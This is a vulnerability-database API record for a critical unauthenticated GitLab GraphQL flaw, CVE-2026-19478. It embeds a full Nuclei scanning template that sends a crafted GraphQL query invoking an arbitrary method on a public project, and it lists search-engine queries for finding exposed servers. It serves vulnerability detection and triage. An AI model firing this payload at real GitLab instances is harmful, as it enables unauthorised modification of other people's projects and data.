{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2026-19478/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2026-19478/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2026-19478/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2026-19478/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2026-19478/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2026-19478"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2026-19478"
    }
  },
  "enrichments": {
    "cisa-kev": {
      "kev": false
    },
    "epss": {
      "epss": 0.05811,
      "kev": false,
      "percentile": 0.92807
    },
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2026/CVE-2026-19478.yaml",
      "nuclei_template_severity": "critical",
      "nuclei_template_yaml": "id: CVE-2026-19478\n\ninfo:\n  name: GitLab CE/EE - GraphQL @gl_introduced Arbitrary Method Invocation\n  author: 0x_Akoko,DhiyaneshDk\n  severity: critical\n  description: |\n    GitLab has remediated an issue in GitLab CE/EE affecting all versions from 18.2 before 18.11.11, 19.0 before 19.0.8, 19.1 before 19.1.6, and 19.2 before 19.2.4 that under certain conditions could allow an unauthenticated user to remotely modify or delete public projects and user data via a GraphQL directive.\n  impact: |\n    An unauthenticated attacker can remotely modify or delete public projects and user data via arbitrary method invocation\n    through a crafted GraphQL query.\n  remediation: |\n    Upgrade GitLab to version 18.11.11, 19.0.8, 19.1.6, or 19.2.4 or later.\n  reference:\n    - https://www.cve.org/CVERecord?id=CVE-2026-19478\n    - https://github.com/davkharrr/CVE-2026-19478-PoC\n    - https://docs.gitlab.com/releases/patches/patch-release-gitlab-19-2-4-released/\n    - https://gitlab.com/gitlab-org/gitlab/-/work_items/611377\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H\n    cvss-score: 9.4\n    cve-id: CVE-2026-19478\n    epss-score: 0.05811\n    epss-percentile: 0.92807\n    cwe-id: CWE-94\n  metadata:\n    max-request: 2\n    verified: true\n    vendor: gitlab\n    product: gitlab\n    shodan-query: http.title:\"GitLab\"\n    fofa-query: title=\"gitlab\"\n    google-query: intitle:\"gitlab\"\n  tags: cve,cve2026,gitlab,graphql,code-injection,unauth,vkev\n\nflow: http(1) && http(2)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/api/v4/projects?visibility=public&per_page=1\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"status_code == 200\"\n          - \"contains(body, 'path_with_namespace')\"\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: project_path\n        group: 1\n        regex:\n          - '\"path_with_namespace\"\\s*:\\s*\"([^\"]+)\"'\n        internal: true\n\n  - raw:\n      - |\n        POST /api/graphql HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"query\":\"query { project(fullPath: \\\"{{project_path}}\\\") { name touch @gl_introduced(version: \\\"999.0.0\\\") } }\"}\n\n    matchers-condition: and\n    matchers:\n      - type: status\n        status:\n          - 200\n\n      - type: word\n        part: body\n        words:\n          - \"doesn't exist on type\"\n        negative: true\n\n      - type: regex\n        part: body\n        regex:\n          - '\"touch\"\\s*:\\s*true'\n\n    extractors:\n      - type: json\n        json:\n          - '.data.project.name'\n# digest: 4b0a0048304602210084fe093bbe1c22b1c61358c28bb70361b7e5ca0bb778582b8c467d3ce4d2019f022100fde1665906c5a7a919d3f41f6882e0177468d015d96f1249e42d4aceaa2fc9c3:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2026-19478"
}